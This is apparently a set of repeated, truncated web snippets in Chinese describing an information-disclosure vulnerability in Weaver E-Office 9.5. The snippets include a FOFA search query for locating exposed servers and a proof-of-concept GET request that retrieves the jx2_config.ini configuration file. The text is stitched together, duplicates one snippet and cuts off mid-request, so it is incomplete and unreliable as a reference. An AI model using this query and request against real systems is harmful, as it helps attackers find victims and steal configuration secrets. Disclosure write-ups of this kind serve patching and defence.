泛微E-Office是一款企业办公自动化软件,由中国泛微软件股份有限公司(简称“泛微软件”)开发。它是基于B/S架构的企业级信息化平台,旨在帮助企业实现办公自动化、流程管理、文档管理等功能,提高工作效率和管理水平。 0x03 漏洞详情 漏洞类型:信息泄露 影响:获取敏感信息 简述:泛微E-Office的/building/backmgr/urlpage/m...
一:漏洞描述 泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。该产品configfile存在信息泄露 二:漏洞影响版本 E-Office 9.5 三:网络空间测绘查询 fofa:app="泛微-EOffice" 四:漏洞复现 POC: GET /building/backmgr/url...
## 泛微E-Office-jx2_config存在信息泄露漏洞 ## fofa ``` app="泛微-EOffice" ``` ## poc ``` GET /building/backmgr/urlpage/mobileurl/configfile/jx2_config.ini HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/...
泛微E-Office是一款企业办公自动化软件,由中国泛微软件股份有限公司(简称“泛微软件”)开发。它是基于B/S架构的企业级信息化平台,旨在帮助企业实现办公自动化、流程管理、文档管理等功能,提高工作效率和管理水平。 0x03 漏洞详情 漏洞类型:信息泄露 影响:获取敏感信息 简述:泛微E-Office的/building/backmgr/urlpage/m...